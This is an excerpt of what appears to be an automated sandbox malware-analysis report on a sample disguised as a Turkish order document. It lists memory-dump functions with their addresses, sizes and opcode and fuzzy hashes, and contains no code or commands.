                                                                                                      • Opcode Fuzzy Hash: c99cf83839142733a0913b999a265d400056aaf3774e285510d7a15c94acebbe
                                                                                                      • Instruction Fuzzy Hash: A3216F75A24314CFC7146F78A89D22EBFA6FF882123048566F946CB285DF35DC01CBA1
                                                                                                      Function 075AABC7 Relevance: .1, Instructions: 77COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9c4584866763d5568caece34349e076e1da28a3208e4903307cf1f02101768b0
                                                                                                      • Instruction ID: 02d0d1c444cc8f481c03dd0006cd5726cfbf0cb2437b34d0d7cee694f142fcfd
                                                                                                      • Opcode Fuzzy Hash: 9c4584866763d5568caece34349e076e1da28a3208e4903307cf1f02101768b0
                                                                                                      • Instruction Fuzzy Hash: 3521866291E7901FF7229B389C706D67FA4DF43129F0940EBE495CF1A2E914480DC76B
                                                                                                      Function 05DDCD90 Relevance: .1, Instructions: 76COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1313837255.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_5dd0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ea688ff3e843f7ddd0a04111853f3b46afe7bbc4fbae9069a6aa7f0048d65fcc
                                                                                                      • Instruction ID: 564c16de70ea47d7a0346cf2cd9c75dc981e3555273f6533c81280a659d1f616
                                                                                                      • Opcode Fuzzy Hash: ea688ff3e843f7ddd0a04111853f3b46afe7bbc4fbae9069a6aa7f0048d65fcc
                                                                                                      • Instruction Fuzzy Hash: DE2175326692158FCB11CF68DD41ABABBA6FB89320F058267E415D72A0D235DD50CBA0
                                                                                                      Function 075A9818 Relevance: .1, Instructions: 73COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c189ca55f86ca23459f39ea344beb939f5e4bbd4b04d0ad66a21ba253c231922
                                                                                                      • Instruction ID: e50cb974bc96f56363df7c955731d88490c2e46a1275a0768b7f2e1ae5fb17e5
                                                                                                      • Opcode Fuzzy Hash: c189ca55f86ca23459f39ea344beb939f5e4bbd4b04d0ad66a21ba253c231922
                                                                                                      • Instruction Fuzzy Hash: 5021CF7571021AAFDB009F68D855ABF7FB6FF88340F804829F812D7340DB35A8149BA1
                                                                                                      Function 013CD01C Relevance: .1, Instructions: 72COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1309300541.00000000013CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013CD000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_13cd000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f167e6c0a02fe572ae99695ba179ca1986f7353b2126612011d1d184a292f300
                                                                                                      • Instruction ID: 25e0b9f7d27c36bb158019e28557f445a6c1d67e0d7443c6e27a5606aa6d3408
                                                                                                      • Opcode Fuzzy Hash: f167e6c0a02fe572ae99695ba179ca1986f7353b2126612011d1d184a292f300
                                                                                                      • Instruction Fuzzy Hash: 30210071604204EFDB15DF68D9C0B26BBA5FB84718F20C57DE80A0B696C336D807CBA2
                                                                                                      Function 013CD1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1309300541.00000000013CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013CD000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_13cd000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 43e7b672965f0f12e1ad10ddda79e75cd39f3aaf608fdde9c81ebb3a4d68e7cf
                                                                                                      • Instruction ID: 70dd9da89dc42858602d6746b5fe208f879853ab371cc01cb0132950edf37b90
                                                                                                      • Opcode Fuzzy Hash: 43e7b672965f0f12e1ad10ddda79e75cd39f3aaf608fdde9c81ebb3a4d68e7cf
                                                                                                      • Instruction Fuzzy Hash: 5321F572504204EFDB15DF94D9C0B26BB66FB84728F20C57DF9094B692C336D846CBA1
                                                                                                      Function 075AFE1F Relevance: .1, Instructions: 71COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ce16b3160a0966389f5dcc5d2a4ac3286f03d18f519796224307d8aecd697104
                                                                                                      • Instruction ID: 69354ee2bb1af7b2ada4cce561ee3d46eae09562b8c14ab4f06c9257aec7e511
                                                                                                      • Opcode Fuzzy Hash: ce16b3160a0966389f5dcc5d2a4ac3286f03d18f519796224307d8aecd697104
                                                                                                      • Instruction Fuzzy Hash: 41219A356143459FD701DF28D894A9ABFB1FF8A324F1580AAE4498F362DB31AD06CB91
                                                                                                      Function 075A6698 Relevance: .1, Instructions: 71COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 42a293cd50534f11020a355c08263db925cbcbd2253b2e179710ecf8832eeae4
                                                                                                      • Instruction ID: 691738252d93c5f50bd5f07cba7f58168c974760d3d23ac6f09c60b02eda5f39
                                                                                                      • Opcode Fuzzy Hash: 42a293cd50534f11020a355c08263db925cbcbd2253b2e179710ecf8832eeae4
                                                                                                      • Instruction Fuzzy Hash: FB213CB1E0121A9FCB05DFA9C885AEEFBF5FF88200F14847AD415E7210D730A906CBA1
                                                                                                      Function 075A5308 Relevance: .1, Instructions: 71COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ef1798090c0e00bfeb49e169cc79347313f6c72f89e45d02c3b298380cb59938
                                                                                                      • Instruction ID: 2b4862aecadd480b94ecd1dc6bc00798b50779bdef617183ef3796994c22847a
                                                                                                      • Opcode Fuzzy Hash: ef1798090c0e00bfeb49e169cc79347313f6c72f89e45d02c3b298380cb59938
                                                                                                      • Instruction Fuzzy Hash: BD11B2F3B0821AAFE714DE69E841AEEF7E5FBC4231B088137E505C7240EA719421C794
                                                                                                      Function 075A6688 Relevance: .1, Instructions: 70COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b18bfd27197b6509185cb76dac55cc6a2021e753426c7ebdcdee2af73d6619a2
                                                                                                      • Instruction ID: efd4ecf24252c231062e3baeab53c30550507405900a5428be1f125bde567317
                                                                                                      • Opcode Fuzzy Hash: b18bfd27197b6509185cb76dac55cc6a2021e753426c7ebdcdee2af73d6619a2
                                                                                                      • Instruction Fuzzy Hash: 2E216FB5E0021AAFCB04DFA9C481AEEFBF1FF88250F14847AD815E7251E7349946CB91
                                                                                                      Function 075ABB80 Relevance: .1, Instructions: 70COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d562643619d014b0ba8f8d7b5b79a9cb56bc8dba548f372c57cc181691057c1f
                                                                                                      • Instruction ID: 59c869e19422b3cabcf2d8be94225fcfdc7843a7e30b49932e375fe2eedfc7aa
                                                                                                      • Opcode Fuzzy Hash: d562643619d014b0ba8f8d7b5b79a9cb56bc8dba548f372c57cc181691057c1f
                                                                                                      • Instruction Fuzzy Hash: BB216A717106019FC725CF29C844D9ABBF6FF84310B4585AAE946CB762DB34EC45CB90
                                                                                                      Function 075A68E8 Relevance: .1, Instructions: 70COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 5a6fca1816a3e825cfd96b01a217267ef3d50574a22ab91d74721642f66f2e83
                                                                                                      • Instruction ID: 61b243dd01c94204a31d28e2c59137e44c4145be61d5ff5307ec89d4ec3d8cae
                                                                                                      • Opcode Fuzzy Hash: 5a6fca1816a3e825cfd96b01a217267ef3d50574a22ab91d74721642f66f2e83
                                                                                                      • Instruction Fuzzy Hash: 4F1191717102119FDB141E79B4486ADBBAAFBC127631840BBE10AC7350CF21C842C761
                                                                                                      Function 05DDE200 Relevance: .1, Instructions: 69COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1313837255.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_5dd0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 27691c5acc02991e935d22962fc0bbadfd94fb7cd630cd0ba1c6fd39184787ce
                                                                                                      • Instruction ID: 18961c52ffaebe699db7f918714efb0896bfd03570b5aa713a328fe9aac9d7b5
                                                                                                      • Opcode Fuzzy Hash: 27691c5acc02991e935d22962fc0bbadfd94fb7cd630cd0ba1c6fd39184787ce
                                                                                                      • Instruction Fuzzy Hash: 0521A2307442049FE7288A658806BBABB6BFBC6711F54C52BE1078F295CA71DC4187B1
                                                                                                      Function 075A3520 Relevance: .1, Instructions: 67COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 692f53031b99f5958e63dc23a71bf6c33012b674a1668bbcdae93e9e48a804f0
                                                                                                      • Instruction ID: 9120d6a692cd5d3e15d013366ee5a966e3a9c55b1ab4603f112d443423e63e84
                                                                                                      • Opcode Fuzzy Hash: 692f53031b99f5958e63dc23a71bf6c33012b674a1668bbcdae93e9e48a804f0
                                                                                                      • Instruction Fuzzy Hash: 6521AC31701340AFD325DF38D494E5A7FB6EF85324B5480AAE5868B3A2CB30ED45CB60
                                                                                                      Function 075A6A38 Relevance: .1, Instructions: 66COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c3b290ce04d54fdb2b9cd2e914bb39fef451266b54a07964f385943e2bb52296
                                                                                                      • Instruction ID: 979a912c94bbe4e941491728bbdc1b4e23ae7d7b3ad5cd6a56fc3c57ec051f2f
                                                                                                      • Opcode Fuzzy Hash: c3b290ce04d54fdb2b9cd2e914bb39fef451266b54a07964f385943e2bb52296
                                                                                                      • Instruction Fuzzy Hash: CC11B175600342EFD7258FA5E480A57BBA6FF82224718C57BE54A8B312CB31EC41C761
                                                                                                      Function 05DDCDA0 Relevance: .1, Instructions: 66COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1313837255.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_5dd0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f56bd38547ee7dcf4475975c74aee0809ed9db4ee2739528bc85c42aed93a0cb
                                                                                                      • Instruction ID: c6345680eb41b369d5586c9667df663fb087df2cdf3be535b15b621bfc6cf385
                                                                                                      • Opcode Fuzzy Hash: f56bd38547ee7dcf4475975c74aee0809ed9db4ee2739528bc85c42aed93a0cb
                                                                                                      • Instruction Fuzzy Hash: FA21A9326242058BCB10CF68DD41ABAFBB6FB88320F058123E515D72B4D735DD50C7A0
                                                                                                      Function 075A7F10 Relevance: .1, Instructions: 64COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a367efbfa72ee3e6668f837fe524168872bdf4194609c5a29f281cdeb57671f9
                                                                                                      • Instruction ID: 2428d532856d3c7fef4c83e262f8d5f28f3ec78bb2c3a8eac41e6748bf9e7144
                                                                                                      • Opcode Fuzzy Hash: a367efbfa72ee3e6668f837fe524168872bdf4194609c5a29f281cdeb57671f9
                                                                                                      • Instruction Fuzzy Hash: 9B216D71A00249AFDF14CFE4C880BAE7BB5FF48310F10856AE911AF395DA31E946CB40
                                                                                                      Function 075A3A34 Relevance: .1, Instructions: 64COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f72db015ef541b79595f3e2d95eb20dd5d3925bb527370124460f466b89db039
                                                                                                      • Instruction ID: 31e67c5446087dc480aead5ea01cfadfd55be591e547761331a4fe8f7cb627c4
                                                                                                      • Opcode Fuzzy Hash: f72db015ef541b79595f3e2d95eb20dd5d3925bb527370124460f466b89db039
                                                                                                      • Instruction Fuzzy Hash: A921DF713083406FE312CF64D894BAA3BB9FB4A214F08449BE015CF2A2EB71E8058B61
                                                                                                      Function 05DDE1F0 Relevance: .1, Instructions: 64COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1313837255.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_5dd0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a459ec7992eade26138ec4f3f084fa98ed45ff02d6ceccfefbe1d9d655aec8b0
                                                                                                      • Instruction ID: 1c2ce40637262d5b714289b1e5fe4358a906781ca59e7a73a76ff043f4fd393e
                                                                                                      • Opcode Fuzzy Hash: a459ec7992eade26138ec4f3f084fa98ed45ff02d6ceccfefbe1d9d655aec8b0
                                                                                                      • Instruction Fuzzy Hash: 6B110030745200DFE7148A548802FB5BB6BFB86711F59C16BE1068F295C671DC41CBB1
                                                                                                      Function 013CD006 Relevance: .1, Instructions: 63COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1309300541.00000000013CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013CD000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_13cd000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6f5e573c3865048c247a474b1f290030e4c8806c3af45bbc67eadda8f2f91048
                                                                                                      • Instruction ID: f5f4e27f20aec912da62dc6a6801b8c22c56ae6d0531b1968dbc173f81958745
                                                                                                      • Opcode Fuzzy Hash: 6f5e573c3865048c247a474b1f290030e4c8806c3af45bbc67eadda8f2f91048
                                                                                                      • Instruction Fuzzy Hash: E12180755083809FCB02CF58D994711BF71EB46214F28C5EAD8498F6A7C33A9806CBA2
                                                                                                      Function 05DD6A40 Relevance: .1, Instructions: 62COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1313837255.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_5dd0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 731a3312f89286050b21e32850cde37ecb015db0a1edbfebf7a96dcb0461d1e9
                                                                                                      • Instruction ID: d2ed8c86d65c46ddfbc277932bd61bd107ac23cb912137fbd35b49f8f1fcf1ac
                                                                                                      • Opcode Fuzzy Hash: 731a3312f89286050b21e32850cde37ecb015db0a1edbfebf7a96dcb0461d1e9
                                                                                                      • Instruction Fuzzy Hash: 8511C231B0021747D625E6AD9880D7EE3A7FFC4210B64C62BA1868F344EE61EC02C7E1
                                                                                                      Function 05DD988E Relevance: .1, Instructions: 62COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1313837255.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_5dd0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 7c3722cb0ba4541fa90d1376565850d7e679a506e8552e88dd651092f0da5ce4
                                                                                                      • Instruction ID: 8b4f838de1c745e58153e11bcdff498d65f350528fa804d6870630a3248aad20
                                                                                                      • Opcode Fuzzy Hash: 7c3722cb0ba4541fa90d1376565850d7e679a506e8552e88dd651092f0da5ce4
                                                                                                      • Instruction Fuzzy Hash: 2621AF72E05606CBDB20CB69C8216BEF3B1FF04B15F08852BE5A6D6281E336D654C667
                                                                                                      Function 075A9010 Relevance: .1, Instructions: 61COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 835056ca7fd3593fe795b979175804bdc003a847f1a8f132de79dae23501e447
                                                                                                      • Instruction ID: bc9eba486ab6ddeb30f92dbdb37e76a38c4b427b459e1d477920e78ffa0ad720
                                                                                                      • Opcode Fuzzy Hash: 835056ca7fd3593fe795b979175804bdc003a847f1a8f132de79dae23501e447
                                                                                                      • Instruction Fuzzy Hash: 7C01D6F0B152236BE724156FA4507BF698FBBC46D0F54803BA506C7780DF66EC4282A2
                                                                                                      Function 05DD9904 Relevance: .1, Instructions: 61COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1313837255.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_5dd0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 84727ff87957a1b07cc5d0766e12a42b7a5a7c0817cc91a48db891bc36c0bbca
                                                                                                      • Instruction ID: 2b6bf6471a8dafcdc1dea27d9ddf915a0fa29d2a4478e9b92f5b5ca5c828319c
                                                                                                      • Opcode Fuzzy Hash: 84727ff87957a1b07cc5d0766e12a42b7a5a7c0817cc91a48db891bc36c0bbca
                                                                                                      • Instruction Fuzzy Hash: 1221AE72904605C6DB20CB69CC216BEF3B1FF00B15F08951BE0A696181E336D555C667
                                                                                                      Function 05DD60C8 Relevance: .1, Instructions: 60COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1313837255.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_5dd0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3d1fd8335e93c08aa49e511c39d84d781d09a35b00c483aee396b2565131a54c
                                                                                                      • Instruction ID: 8e71d618873a49cc6d006808d8daa1be6a172d4f6c0f1f79614d84f72d68b614
                                                                                                      • Opcode Fuzzy Hash: 3d1fd8335e93c08aa49e511c39d84d781d09a35b00c483aee396b2565131a54c
                                                                                                      • Instruction Fuzzy Hash: C31102357193054BCB055BB8A81453ABBFAAB8624074544A7D50ACB393DE20DC01C7F2
                                                                                                      Function 075A1218 Relevance: .1, Instructions: 59COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 22815f77b37746a0cb0bcf0fc5f91cecade1c5d3c1265e6a4391d65e198bf78d
                                                                                                      • Instruction ID: 5aea9439dbb1d135953c67811adcb5ab99f6a0a0a6e53568f1002d6f8a4512dc
                                                                                                      • Opcode Fuzzy Hash: 22815f77b37746a0cb0bcf0fc5f91cecade1c5d3c1265e6a4391d65e198bf78d
                                                                                                      • Instruction Fuzzy Hash: 7F118A7161970EEFCB10DB99D8809AEBBB9FF89654F148167E808D7304EA729D0187A1
                                                                                                      Function 05DD6A31 Relevance: .1, Instructions: 59COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1313837255.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_5dd0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f4bc29975b3f362f8c7cd778605b1f828f7eb707406291c3e45ab1cd758a7c3f
                                                                                                      • Instruction ID: 467e234f5864936d96cee3c0f58ad7fe1d76abdaeb3fc06d127d649ce896ddb3
                                                                                                      • Opcode Fuzzy Hash: f4bc29975b3f362f8c7cd778605b1f828f7eb707406291c3e45ab1cd758a7c3f
                                                                                                      • Instruction Fuzzy Hash: 3711A9317002125BD624E6A8DC80E7EF793FFC4210B65C727A5458F394EA65EC06C7E1
                                                                                                      Function 05DD7638 Relevance: .1, Instructions: 59COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1313837255.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_5dd0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2552689fa0152ed29fd734b4572791fe3bcac6d65855b5b85ab6b2e36acfd378
                                                                                                      • Instruction ID: b22d6f1beeac8d91010984f848443a82c417e9ed6f7add1b4aa7287e999fd483
                                                                                                      • Opcode Fuzzy Hash: 2552689fa0152ed29fd734b4572791fe3bcac6d65855b5b85ab6b2e36acfd378
                                                                                                      • Instruction Fuzzy Hash: 5D1197B1528906CBD698FBACAC4E639BF77EB8520174044D7F44786A60EF7299008E76
                                                                                                      Function 075ACF40 Relevance: .1, Instructions: 57COMMON
